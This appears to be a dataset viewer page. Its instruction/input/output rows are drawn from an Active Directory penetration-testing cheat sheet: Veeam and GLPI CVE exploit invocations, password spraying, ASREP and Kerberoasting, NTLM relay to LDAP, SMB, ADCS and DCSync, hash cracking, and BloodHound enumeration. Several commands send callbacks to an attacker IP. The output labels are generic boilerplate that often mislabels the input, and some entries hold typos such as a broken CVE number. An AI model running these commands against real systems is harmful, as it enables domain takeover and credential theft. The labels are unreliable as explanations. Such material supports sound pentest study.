instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Veeam: | CVE-2023-27532 net.tcp:/<target>:<port>/ | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-29849 (auth bypass - Veeam Backup Enterprise Manager) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-29849.py --target https://<veeam_ip>:<veeam_port>/ --callback-server <attacker_ip>:<port> | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-29855 (auth bypass - Veeam Recovery Orchestrator) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-29855.py --start_time <start_time_epoch> --end_time <end_time_epoch> --username <user>@<domain> --target https://<veeam_ip>:<veeam_port>/ | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-40711 (unserialize - Veeam backup) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://<attacker_ip>:8000/trigger --targetveeam <veeam_ip> | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
GLPI: | CVE-2022-35914 | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
GLPI: | /vendor/htmlawed/htmlawed/htmLawedTest.php | Note or procedural step under 'GLPI:'. |
GLPI: | CVE_2023_41320 | Note or procedural step under 'GLPI:'. |
GLPI: | cve_2023_41320.py -u <user> -p <password> -t <ip> | Note or procedural step under 'GLPI:'. |
GLPI: > Weak websites / services | nuclei | Note or procedural step under 'GLPI: > Weak websites / services'. |
GLPI: > Weak websites / services | nuclei -target <ip_range> | Note or procedural step under 'GLPI: > Weak websites / services'. |
GLPI: > Weak websites / services | nessus | Note or procedural step under 'GLPI: > Weak websites / services'. |
Password Spray | Get password policy (you need creds,but you should get the policy first to avoid locking accounts) | Note or procedural step under 'Password Spray'. |
Password Spray | default policy | Note or procedural step under 'Password Spray'. |
Password Spray | nxc smb <dc_ip> -u '<user>' -p '<password>' -pass-pol | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Password Spray | Get-ADDefaultDomainPasswordPolicy | Note or procedural step under 'Password Spray'. |
Password Spray | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> domain_policy | Note or procedural step under 'Password Spray'. |
Password Spray | Fined Policy (Privileged) | Note or procedural step under 'Password Spray'. |
Password Spray | ldapsearch-ad.py --server <dc> -d <domain> -u <user> -p <pass> --type pass-pol | Tool or command referenced under 'Password Spray'. |
Password Spray | Get-ADFineGainedPasswordPolicy -filter * | Note or procedural step under 'Password Spray'. |
Password Spray | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> pso # can also be runned with a low priv account but less information will be available | Note or procedural step under 'Password Spray'. |
Password Spray | user == password | Note or procedural step under 'Password Spray'. |
Password Spray | nxc smb <dc_ip> -u <users.txt> -p <passwords.txt> --no-bruteforce --continue-on-success | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Password Spray | sprayhound -U <users.txt> -d <domain> -dc <dc_ip> # add --lower to lowercase and --upper to uppercase. Add nothing to get only user=pass | Note or procedural step under 'Password Spray'. |
Password Spray | usuals passwords (SeasonYear!, Company123, ...) | Note or procedural step under 'Password Spray'. |
Password Spray | nxc smb <dc_ip> -u <users.txt> -p <password> --continue-on-success | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Password Spray | sprayhound -U <users.txt> -p <password> -d <domain> -dc <dc_ip> | Note or procedural step under 'Password Spray'. |
Password Spray | kerbrute passwordspray -d <domain> <users.txt> <password> | Tool or command referenced under 'Password Spray'. |
ASREPRoast | List ASREPRoastable Users (need creds) | Note or procedural step under 'ASREPRoast'. |
ASREPRoast | Bloodhound: MATCH (u:User) WHERE u.dontreqpreauth = true AND u.enabled = true RETURN u | Note or procedural step under 'ASREPRoast'. |
ASREPRoast | nxc ldap <dc_ip> -u <users.txt> -p '' --asreproast <output.txt> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
ASREPRoast | ASREP roasting | Note or procedural step under 'ASREPRoast'. |
ASREPRoast | GetNPUsers.py <domain>/ -usersfile <users.txt> -format hashcat -outputfile <output.txt> | Tool or command referenced under 'ASREPRoast'. |
ASREPRoast | nxc ldap <dc_ip> -u <users.txt> -p '' --asreproast <output.txt> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
ASREPRoast | Rubeus.exe asreproast /format:hashcat | Tool or command referenced under 'ASREPRoast'. |
ASREPRoast > Blind Kerberoasting | Rubeus.exe keberoast /domain:<domain> /dc:<dcip> /nopreauth: <asrep_user> /spns:<users.txt> | Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'. |
ASREPRoast > Blind Kerberoasting | GetUserSPNs.py -no-preauth "<asrep_user>" -usersfile "<user_list.txt>" -dc-host "<dc_ip>" "<domain>"/ | Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'. |
ASREPRoast > Blind Kerberoasting | CVE-2022-33679 | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
ASREPRoast > Blind Kerberoasting | CVE-2022-33679.py <domain>/<user> <target> | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Listen | Respinder -l <interface> #use --lm to force downgrade | Note or procedural step under 'Listen'. |
Listen | smbclient.py | SMB client usage to list or access network shares. |
NTLM relay | MS-08-068 self relay | Note or procedural step under 'NTLM relay'. |
NTLM relay | msf>exploit/windows/smb_smb_relay #windows 2000 / windows 2008 server | Tool or command referenced under 'NTLM relay'. |
NTLM relay | smb -> LDAP(S) | Note or procedural step under 'NTLM relay'. |
NTLM relay | NTLMv1 | Note or procedural step under 'NTLM relay'. |
NTLM relay | remove mic (no CVE needed) | Note or procedural step under 'NTLM relay'. |
NTLM relay | NTLMv2 | Note or procedural step under 'NTLM relay'. |
NTLM relay | remove mic (CVE-2019-10140) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
NTLM relay | HTTP(S) -> LDAP(S) | Note or procedural step under 'NTLM relay'. |
NTLM relay | Usually from webdev coerce | Note or procedural step under 'NTLM relay'. |
NTLM relay > To LDAP(S) | Relay to LDAP if LDAP signing and LDAPS channel binding not enfoeced (default) | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) | ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --add-computer <computer_name> <computer_password> --delegate-access #RBCD | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) | ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --shadow-credentials --shadow-target '<dc_name$>' #Shadow Credentials | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) | ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --escalate-user <user> #Domain Admin | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) | ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111 #LDAP SHELL | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) > To SMB | Relay to SMB (if SMB is not signed) | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'. |
NTLM relay > To LDAP(S) > To SMB | Find SMB not signed targets (default if not a Domain controler) | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'. |
NTLM relay > To LDAP(S) > To SMB | nxc smb <ip_range> --gen-relay-list smb_unsigned_ips.txt | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
NTLM relay > To LDAP(S) > To SMB | ntlmrelayx.py -tf smb_unsigned_ips.txt -smb2support [--ipv6] -socks #SMB Socks | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP | Relay to CA web enrollement | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP | Relay to WSUS | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL | ntlmrelayx.py -t mssql://<ip> [-smb2support] -socks | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | Zero-Logon (safe method) (CVE-202-1472) | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | Relay one dc to another | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | ntlmrelayx.py -t dcsync://<dc_to_ip> -smb2support -auth-smb <user>:<password> | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | To HTTP | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | krbrelayx.py -t 'http://<pki>/certsrv/certfnsh.asp' --adcs --template DomainController -v '<target_netbios>$' -ip <attacker_ip> | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB | same as NTLM relay, use krbrelayx.py | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S) | same as NTLM relay, use krbrelayx.py | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S)'. |
LM (299bd128c1101fd6) | john --format=lm hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'LM (299bd128c1101fd6)'. |
LM (299bd128c1101fd6) | hashcat -m 3000 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'LM (299bd128c1101fd6)'. |
NT (b4b9b02e6f09a9bd760...) | john --format=nt hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'. |
NT (b4b9b02e6f09a9bd760...) | hashcat -m 1000 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'. |
NTLMv1 (user::85D5BC...) | john --format=netntlm hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'NTLMv1 (user::85D5BC...)'. |
NTLMv1 (user::85D5BC...) | hashcat -m 1000 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'NTLMv1 (user::85D5BC...)'. |
NTLMv1 (user::85D5BC...) | crack.sh | Note or procedural step under 'NTLMv1 (user::85D5BC...)'. |
NTLMv2 (user::N46iSNek...) | john --format=netntlmv2 hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'. |
NTLMv2 (user::N46iSNek...) | hashcat -m 5600 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'. |
Kerberos 5 TGS ($krb5tgs$23$...) | john --format=krb5tgs hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'. |
Kerberos 5 TGS ($krb5tgs$23$...) | hashcat -m 13100 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'. |
($krb5tgs$17...) | hashcat -m 19600 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under '($krb5tgs$17...)'. |
Kerberos ASREP ($krb5asrep$23...) | hashcat -m 18200 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'Kerberos ASREP ($krb5asrep$23...)'. |
($DCC2$10240...) | hashcat -m 2100 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under '($DCC2$10240...)'. |
($DCC2$10240...) | Timeroast hash ($sntp-ms$...) | Note or procedural step under '($DCC2$10240...)'. |
($DCC2$10240...) | hashcat -m 31300 -a 3 hash.txt -w 3 ?l?l?l?l?l?l?l | Tool or command referenced under '($DCC2$10240...)'. |
pxe hash ($sccm$aes128$...) | hashcat -m 19850 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'pxe hash ($sccm$aes128$...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Find all users | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | nxc smb <dc_ip> -u '<user>' -p '<password>' --users | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Enumerate SMB share | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | nxc smb <ip_range> -u '<user>' -p '<password>' -M spider_plus | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Classic Enumeration (users, shares, ACL, delegation, ...) | xc smb <ip_range> -u '<user>' -p '<password>' --shares [--get-file \\<filename> <filename>] | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | manspider <ip_range> -c passw -e <file extensions> -d <domain> -u <user> -p <password> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Bloodhound Legacy | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | rusthound -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile.zip> -z | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | import-module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain <domain> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | sharphound.exe -c all -d <domain> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.